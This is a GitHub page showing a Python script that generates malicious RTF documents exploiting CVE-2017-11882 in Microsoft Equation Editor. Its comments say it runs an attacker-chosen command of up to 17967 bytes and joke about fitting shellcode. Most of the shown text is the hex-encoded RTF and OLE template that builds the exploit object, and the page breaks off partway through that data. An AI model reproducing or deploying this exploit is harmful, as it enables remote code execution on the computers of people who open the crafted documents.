forked from rip1s/CVE-2017-11882
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2017-11882.py
175 lines (139 loc) · 45.4 KB
/
CVE-2017-11882.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
#!/usr/bin/env python
# Original poc :https://github.com/embedi/CVE-2017-11882
# This version accepts a command with 17967 bytes long in maximum.
# Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution.
# But that's enough for exploitation. I bet your shellcode is shorter.:)
__author__ = "@unamer"
import argparse
from struct import pack
head17k = r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000B0000004571756174696F6E2E3300000000000000000000540000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFFFEFFFFFFFEFFFFFF060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C00000000000004600000000000000000000000070B01C713B64D30103000000000100000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201FFFFFFFF04000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000500000087460000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
'''
tail17k = r'''000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C455049435400F6750000D58CFFFF6A2E00000800F6752B7300000100090000033117000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C024080006B1200000026060F001A00FFFFFFFF000010000000C0FFFFFF1E000000C06A00005E8000000B00000026060F000C004D617468547970650000E01F1C000000FB0280FE0000000000009001010000000402001054696D6573204E657720526F6D616E00FEFFFFFF21160A6300000A0000000000040000002D01000008000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320A087FBA340100000061000C000000320A087F3A2D0A000000616161616161616161610C000000320A087FBA250A000000616161616161616161610C000000320A087F3A1E0A000000616161616161616161610C000000320A087FBA160A000000616161616161616161610C000000320A087F3A0F0A000000616161616161616161610C000000320A087FBA070A000000616161616161616161610C000000320A087F3A000A0000006161616161616161616108000000320AC87CBA340100000061000C000000320AC87C3A2D0A000000616161616161616161610C000000320AC87CBA250A000000616161616161616161610C000000320AC87C3A1E0A000000616161616161616161610C000000320AC87CBA160A000000616161616161616161610C000000320AC87C3A0F0A000000616161616161616161610C000000320AC87CBA070A000000616161616161616161610C000000320AC87C3A000A0000006161616161616161616108000000320A887ABA340100000061790C000000320A887A3A2D0A000000616161616161616161610C000000320A887ABA250A000000616161616161616161610C000000320A887A3A1E0A000000616161616161616161610C000000320A887ABA160A000000616161616161616161610C000000320A887A3A0F0A000000616161616161616161610C000000320A887ABA070A000000616161616161616161610C000000320A887A3A000A0000006161616161616161616108000000320A4878BA340100000061000C000000320A48783A2D0A000000616161616161616161610C000000320A4878BA250A000000616161616161616161610C000000320A48783A1E0A000000616161616161616161610C000000320A4878BA160A000000616161616161616161610C000000320A48783A0F0A000000616161616161616161610C000000320A4878BA070A000000616161616161616161610C000000320A48783A000A0000006161616161616161616108000000320A0876BA340100000061000C000000320A08763A2D0A000000616161616161616161610C000000320A0876BA250A000000616161616161616161610C000000320A08763A1E0A000000616161616161616161610C000000320A0876BA160A000000616161616161616161610C000000320A08763A0F0A000000616161616161616161610C000000320A0876BA070A000000616161616161616161610C000000320A08763A000A0000006161616161616161616108000000320AC873BA340100000061000C000000320AC8733A2D0A000000616161616161616161610C000000320AC873BA250A000000616161616161616161610C000000320AC8733A1E0A000000616161616161616161610C000000320AC873BA160A000000616161616161616161610C000000320AC8733A0F0A000000616161616161616161610C000000320AC873BA070A000000616161616161616161610C000000320AC8733A000A0000006161616161616161616108000000320A8871BA340100000061000C000000320A88713A2D0A000000616161616161616161610C000000320A8871BA250A000000616161616161616161610C000000320A88713A1E0A000000616161616161616161610C000000320A8871BA160A000000616161616161616161610C000000320A88713A0F0A000000616161616161616161610C000000320A8871BA070A000000616161616161616161610C000000320A88713A000A0000006161616161616161616108000000320A486FBA340100000061000C000000320A486F3A2D0A000000616161616161616161610C000000320A486FBA250A000000616161616161616161610C000000320A486F3A1E0A000000616161616161616161610C000000320A486FBA160A000000616161616161616161610C000000320A486F3A0F0A000000616161616161616161610C000000320A486FBA070A000000616161616161616161610C000000320A486F3A000A0000006161616161616161616108000000320A086DBA340100000061000C000000320A086D3A2D0A000000616161616161616161610C000000320A086DBA250A000000616161616161616161610C000000320A086D3A1E0A000000616161616161616161610C000000320A086DBA160A000000616161616161616161610C000000320A086D3A0F0A000000616161616161616161610C000000320A086DBA070A000000616161616161616161610C000000320A086D3A000A0000006161616161616161616108000000320AC86ABA340100000061000C000000320AC86A3A2D0A000000616161616161616161610C000000320AC86ABA250A000000616161616161616161610C000000320AC86A3A1E0A000000616161616161616161610C000000320AC86ABA160A000000616161616161616161610C000000320AC86A3A0F0A000000616161616161616161610C000000320AC86ABA070A000000616161616161616161610C000000320AC86A3A000A0000006161616161616161616108000000320A8868BA340100000061000C000000320A88683A2D0A000000616161616161616161610C000000320A8868BA250A000000616161616161616161610C000000320A88683A1E0A000000616161616161616161610C000000320A8868BA160A000000616161616161616161610C000000320A88683A0F0A000000616161616161616161610C000000320A8868BA070A000000616161616161616161610C000000320A88683A000A0000006161616161616161616108000000320A4866BA340100000061000C000000320A48663A2D0A000000616161616161616161610C000000320A4866BA250A000000616161616161616161610C000000320A48663A1E0A000000616161616161616161610C000000320A4866BA160A000000616161616161616161610C000000320A48663A0F0A000000616161616161616161610C000000320A4866BA070A000000616161616161616161610C000000320A48663A000A0000006161616161616161616108000000320A0864BA340100000061000C000000320A08643A2D0A000000616161616161616161610C000000320A0864BA250A000000616161616161616161610C000000320A08643A1E0A000000616161616161616161610C000000320A0864BA160A000000616161616161616161610C000000320A08643A0F0A000000616161616161616161610C000000320A0864BA070A000000616161616161616161610C000000320A08643A000A0000006161616161616161616108000000320AC861BA340100000061000C000000320AC8613A2D0A000000616161616161616161610C000000320AC861BA250A000000616161616161616161610C000000320AC8613A1E0A000000616161616161616161610C000000320AC861BA160A000000616161616161616161610C000000320AC8613A0F0A000000616161616161616161610C000000320AC861BA070A000000616161616161616161610C000000320AC8613A000A0000006161616161616161616108000000320A885FBA340100000061000C000000320A885F3A2D0A000000616161616161616161610C000000320A885FBA250A000000616161616161616161610C000000320A885F3A1E0A000000616161616161616161610C000000320A885FBA160A000000616161616161616161610C000000320A885F3A0F0A000000616161616161616161610C000000320A885FBA070A000000616161616161616161610C000000320A885F3A000A0000006161616161616161616108000000320A485DBA340100000061000C000000320A485D3A2D0A000000616161616161616161610C000000320A485DBA250A000000616161616161616161610C000000320A485D3A1E0A000000616161616161616161610C000000320A485DBA160A000000616161616161616161610C000000320A485D3A0F0A000000616161616161616161610C000000320A485DBA070A000000616161616161616161610C000000320A485D3A000A0000006161616161616161616108000000320A085BBA340100000061000C000000320A085B3A2D0A000000616161616161616161610C000000320A085BBA250A000000616161616161616161610C000000320A085B3A1E0A000000616161616161616161610C000000320A085BBA160A000000616161616161616161610C000000320A085B3A0F0A000000616161616161616161610C000000320A085BBA070A000000616161616161616161610C000000320A085B3A000A0000006161616161616161616108000000320AC858BA340100000061000C000000320AC8583A2D0A000000616161616161616161610C000000320AC858BA250A000000616161616161616161610C000000320AC8583A1E0A000000616161616161616161610C000000320AC858BA160A000000616161616161616161610C000000320AC8583A0F0A000000616161616161616161610C000000320AC858BA070A000000616161616161616161610C000000320AC8583A000A0000006161616161616161616108000000320A8856BA340100000061000C000000320A88563A2D0A000000616161616161616161610C000000320A8856BA250A000000616161616161616161610C000000320A88563A1E0A000000616161616161616161610C000000320A8856BA160A000000616161616161616161610C000000320A88563A0F0A000000616161616161616161610C000000320A8856BA070A000000616161616161616161610C000000320A88563A000A0000006161616161616161616108000000320A4854BA340100000061000C000000320A48543A2D0A000000616161616161616161610C000000320A4854BA250A000000616161616161616161610C000000320A48543A1E0A000000616161616161616161610C000000320A4854BA160A000000616161616161616161610C000000320A48543A0F0A000000616161616161616161610C000000320A4854BA070A000000616161616161616161610C000000320A48543A000A0000006161616161616161616108000000320A0852BA340100000061000C000000320A08523A2D0A000000616161616161616161610C000000320A0852BA250A000000616161616161616161610C000000320A08523A1E0A000000616161616161616161610C000000320A0852BA160A000000616161616161616161610C000000320A08523A0F0A000000616161616161616161610C000000320A0852BA070A000000616161616161616161610C000000320A08523A000A0000006161616161616161616108000000320AC84FBA340100000061000C000000320AC84F3A2D0A000000616161616161616161610C000000320AC84FBA250A000000616161616161616161610C000000320AC84F3A1E0A000000616161616161616161610C000000320AC84FBA160A000000616161616161616161610C000000320AC84F3A0F0A000000616161616161616161610C000000320AC84FBA070A000000616161616161616161610C000000320AC84F3A000A0000006161616161616161616108000000320A884DBA340100000061000C000000320A884D3A2D0A000000616161616161616161610C000000320A884DBA250A000000616161616161616161610C000000320A884D3A1E0A000000616161616161616161610C000000320A884DBA160A000000616161616161616161610C000000320A884D3A0F0A000000616161616161616161610C000000320A884DBA070A000000616161616161616161610C000000320A884D3A000A0000006161616161616161616108000000320A484BBA340100000061000C000000320A484B3A2D0A000000616161616161616161610C000000320A484BBA250A000000616161616161616161610C000000320A484B3A1E0A000000616161616161616161610C000000320A484BBA160A000000616161616161616161610C000000320A484B3A0F0A000000616161616161616161610C000000320A484BBA070A000000616161616161616161610C000000320A484B3A000A0000006161616161616161616108000000320A0849BA340100000061000C000000320A08493A2D0A000000616161616161616161610C000000320A0849BA250A000000616161616161616161610C000000320A08493A1E0A000000616161616161616161610C000000320A0849BA160A000000616161616161616161610C000000320A08493A0F0A000000616161616161616161610C000000320A0849BA070A000000616161616161616161610C000000320A08493A000A0000006161616161616161616108000000320AC846BA340100000061000C000000320AC8463A2D0A000000616161616161616161610C000000320AC846BA250A000000616161616161616161610C000000320AC8463A1E0A000000616161616161616161610C000000320AC846BA160A000000616161616161616161610C000000320AC8463A0F0A000000616161616161616161610C000000320AC846BA070A000000616161616161616161610C000000320AC8463A000A0000006161616161616161616108000000320A8844BA340100000061000C000000320A88443A2D0A000000616161616161616161610C000000320A8844BA250A000000616161616161616161610C000000320A88443A1E0A000000616161616161616161610C000000320A8844BA160A000000616161616161616161610C000000320A88443A0F0A000000616161616161616161610C000000320A8844BA070A000000616161616161616161610C000000320A88443A000A0000006161616161616161616108000000320A4842BA340100000061000C000000320A48423A2D0A000000616161616161616161610C000000320A4842BA250A000000616161616161616161610C000000320A48423A1E0A000000616161616161616161610C000000320A4842BA160A000000616161616161616161610C000000320A48423A0F0A000000616161616161616161610C000000320A4842BA070A000000616161616161616161610C000000320A48423A000A0000006161616161616161616108000000320A0840BA340100000061000C000000320A08403A2D0A000000616161616161616161610C000000320A0840BA250A000000616161616161616161610C000000320A08403A1E0A000000616161616161616161610C000000320A0840BA160A000000616161616161616161610C000000320A08403A0F0A000000616161616161616161610C000000320A0840BA070A000000616161616161616161610C000000320A08403A000A0000006161616161616161616108000000320AC83DBA340100000061000C000000320AC83D3A2D0A000000616161616161616161610C000000320AC83DBA250A000000616161616161616161610C000000320AC83D3A1E0A000000616161616161616161610C000000320AC83DBA160A000000616161616161616161610C000000320AC83D3A0F0A000000616161616161616161610C000000320AC83DBA070A000000616161616161616161610C000000320AC83D3A000A0000006161616161616161616108000000320A883BBA340100000061000C000000320A883B3A2D0A000000616161616161616161610C000000320A883BBA250A000000616161616161616161610C000000320A883B3A1E0A000000616161616161616161610C000000320A883BBA160A000000616161616161616161610C000000320A883B3A0F0A000000616161616161616161610C000000320A883BBA070A000000616161616161616161610C000000320A883B3A000A0000006161616161616161616108000000320A4839BA340100000061000C000000320A48393A2D0A000000616161616161616161610C000000320A4839BA250A000000616161616161616161610C000000320A48393A1E0A000000616161616161616161610C000000320A4839BA160A000000616161616161616161610C000000320A48393A0F0A000000616161616161616161610C000000320A4839BA070A000000616161616161616161610C000000320A48393A000A0000006161616161616161616108000000320A0837BA340100000061000C000000320A08373A2D0A000000616161616161616161610C000000320A0837BA250A000000616161616161616161610C000000320A08373A1E0A000000616161616161616161610C000000320A0837BA160A000000616161616161616161610C000000320A08373A0F0A000000616161616161616161610C000000320A0837BA070A000000616161616161616161610C000000320A08373A000A0000006161616161616161616108000000320AC834BA340100000061000C000000320AC8343A2D0A000000616161616161616161610C000000320AC834BA250A000000616161616161616161610C000000320AC8343A1E0A000000616161616161616161610C000000320AC834BA160A000000616161616161616161610C000000320AC8343A0F0A000000616161616161616161610C000000320AC834BA070A000000616161616161616161610C000000320AC8343A000A0000006161616161616161616108000000320A8832BA340100000061790C000000320A88323A2D0A000000616161616161616161610C000000320A8832BA250A000000616161616161616161610C000000320A88323A1E0A000000616161616161616161610C000000320A8832BA160A000000616161616161616161610C000000320A88323A0F0A000000616161616161616161610C000000320A8832BA070A000000616161616161616161610C000000320A88323A000A0000006161616161616161616108000000320A4830BA340100000061000C000000320A48303A2D0A000000616161616161616161610C000000320A4830BA250A000000616161616161616161610C000000320A48303A1E0A000000616161616161616161610C000000320A4830BA160A000000616161616161616161610C000000320A48303A0F0A000000616161616161616161610C000000320A4830BA070A000000616161616161616161610C000000320A48303A000A0000006161616161616161616108000000320A082EBA340100000061000C000000320A082E3A2D0A000000616161616161616161610C000000320A082EBA250A000000616161616161616161610C000000320A082E3A1E0A000000616161616161616161610C000000320A082EBA160A000000616161616161616161610C000000320A082E3A0F0A000000616161616161616161610C000000320A082EBA070A000000616161616161616161610C000000320A082E3A000A0000006161616161616161616108000000320AC82BBA340100000061000C000000320AC82B3A2D0A000000616161616161616161610C000000320AC82BBA250A000000616161616161616161610C000000320AC82B3A1E0A000000616161616161616161610C000000320AC82BBA160A000000616161616161616161610C000000320AC82B3A0F0A000000616161616161616161610C000000320AC82BBA070A000000616161616161616161610C000000320AC82B3A000A0000006161616161616161616108000000320A8829BA340100000061000C000000320A88293A2D0A000000616161616161616161610C000000320A8829BA250A000000616161616161616161610C000000320A88293A1E0A000000616161616161616161610C000000320A8829BA160A000000616161616161616161610C000000320A88293A0F0A000000616161616161616161610C000000320A8829BA070A000000616161616161616161610C000000320A88293A000A0000006161616161616161616108000000320A48273A690200000061610C000000320A4827BA610A000000616161616161616161610C000000320A48273A5A0A000000616161616161616161610C000000320A4827BA520A000000616161616161616161610C000000320A48273A4B0A000000616161616161616161610C000000320A4827BA430A000000616161616161616161610C000000320A48273A3C0A000000616161616161616161610C000000320A4827BA340A000000616161616161616161610C000000320A48273A2D0A000000616161616161616161610C000000320A4827BA250A000000616161616161616161610C000000320A48273A1E0A000000616161616161616161610C000000320A4827BA160A000000616161616161616161610C000000320A48273A0F0A000000616161616161616161610C000000320A4827BA070A000000616161616161616161610C000000320A48273A000A0000006161616161616161616108000000320A0825BA340100000061610C000000320A08253A2D0A000000616161616161616161610C000000320A0825BA250A000000616161616161616161610C000000320A08253A1E0A000000616161616161616161610C000000320A0825BA160A000000616161616161616161610C000000320A08253A0F0A000000616161616161616161610C000000320A0825BA070A000000616161616161616161610C000000320A08253A000A0000006161616161616161616108000000320AC822BA340100000061000C000000320AC8223A2D0A000000616161616161616161610C000000320AC822BA250A000000616161616161616161610C000000320AC8223A1E0A000000616161616161616161610C000000320AC822BA160A000000616161616161616161610C000000320AC8223A0F0A000000616161616161616161610C000000320AC822BA070A000000616161616161616161610C000000320AC8223A000A0000006161616161616161616108000000320A8820BA340100000061000C000000320A88203A2D0A000000616161616161616161610C000000320A8820BA250A000000616161616161616161610C000000320A88203A1E0A000000616161616161616161610C000000320A8820BA160A000000616161616161616161610C000000320A88203A0F0A000000616161616161616161610C000000320A8820BA070A000000616161616161616161610C000000320A88203A000A0000006161616161616161616108000000320A481EBA340100000061610C000000320A481E3A2D0A000000616161616161616161610C000000320A481EBA250A000000616161616161616161610C000000320A481E3A1E0A000000616161616161616161610C000000320A481EBA160A000000616161616161616161610C000000320A481E3A0F0A000000616161616161616161610C000000320A481EBA070A000000616161616161616161610C000000320A481E3A000A0000006161616161616161616108000000320A081CBA340100000061000C000000320A081C3A2D0A000000616161616161616161610C000000320A081CBA250A000000616161616161616161610C000000320A081C3A1E0A000000616161616161616161610C000000320A081CBA160A000000616161616161616161610C000000320A081C3A0F0A000000616161616161616161610C000000320A081CBA070A000000616161616161616161610C000000320A081C3A000A0000006161616161616161616108000000320AC819BA340100000061000C000000320AC8193A2D0A000000616161616161616161610C000000320AC819BA250A000000616161616161616161610C000000320AC8193A1E0A000000616161616161616161610C000000320AC819BA160A000000616161616161616161610C000000320AC8193A0F0A000000616161616161616161610C000000320AC819BA070A000000616161616161616161610C000000320AC8193A000A0000006161616161616161616108000000320A8817BA340100000061610C000000320A88173A2D0A000000616161616161616161610C000000320A8817BA250A000000616161616161616161610C000000320A88173A1E0A000000616161616161616161610C000000320A8817BA160A000000616161616161616161610C000000320A88173A0F0A000000616161616161616161610C000000320A8817BA070A000000616161616161616161610C000000320A88173A000A0000006161616161616161616108000000320A4815BA340100000061000C000000320A48153A2D0A000000616161616161616161610C000000320A4815BA250A000000616161616161616161610C000000320A48153A1E0A000000616161616161616161610C000000320A4815BA160A000000616161616161616161610C000000320A48153A0F0A000000616161616161616161610C000000320A4815BA070A000000616161616161616161610C000000320A48153A000A0000006161616161616161616108000000320A0813BA340100000061610C000000320A08133A2D0A000000616161616161616161610C000000320A0813BA250A000000616161616161616161610C000000320A08133A1E0A000000616161616161616161610C000000320A0813BA160A000000616161616161616161610C000000320A08133A0F0A000000616161616161616161610C000000320A0813BA070A000000616161616161616161610C000000320A08133A000A0000006161616161616161616108000000320AC810BA340100000061000C000000320AC8103A2D0A000000616161616161616161610C000000320AC810BA250A000000616161616161616161610C000000320AC8103A1E0A000000616161616161616161610C000000320AC810BA160A000000616161616161616161610C000000320AC8103A0F0A000000616161616161616161610C000000320AC810BA070A000000616161616161616161610C000000320AC8103A000A0000006161616161616161616108000000320A880EBA340100000061000C000000320A880E3A2D0A000000616161616161616161610C000000320A880EBA250A000000616161616161616161610C000000320A880E3A1E0A000000616161616161616161610C000000320A880EBA160A000000616161616161616161610C000000320A880E3A0F0A000000616161616161616161610C000000320A880EBA070A000000616161616161616161610C000000320A880E3A000A0000006161616161616161616108000000320A480CBA340100000061000C000000320A480C3A2D0A000000616161616161616161610C000000320A480CBA250A000000616161616161616161610C000000320A480C3A1E0A000000616161616161616161610C000000320A480CBA160A000000616161616161616161610C000000320A480C3A0F0A000000616161616161616161610C000000320A480CBA070A000000616161616161616161610C000000320A480C3A000A0000006161616161616161616108000000320A080ABA340100000061610C000000320A080A3A2D0A000000616161616161616161610C000000320A080ABA250A000000616161616161616161610C000000320A080A3A1E0A000000616161616161616161610C000000320A080ABA160A000000616161616161616161610C000000320A080A3A0F0A000000616161616161616161610C000000320A080ABA070A000000616161616161616161610C000000320A080A3A000A0000006161616161616161616108000000320AC807BA340100000061000C000000320AC8073A2D0A000000616161616161616161610C000000320AC807BA250A000000616161616161616161610C000000320AC8073A1E0A000000616161616161616161610C000000320AC807BA160A000000616161616161616161610C000000320AC8073A0F0A000000616161616161616161610C000000320AC807BA070A000000616161616161616161610C000000320AC8073A000A0000006161616161616161616108000000320A8805BA340100000061000C000000320A88053A2D0A000000616161616161616161610C000000320A8805BA250A000000616161616161616161610C000000320A88053A1E0A000000616161616161616161610C000000320A8805BA160A000000616161616161616161610C000000320A88053A0F0A000000616161616161616161610C000000320A8805BA070A000000616161616161616161610C000000320A88053A000A00000061616161616161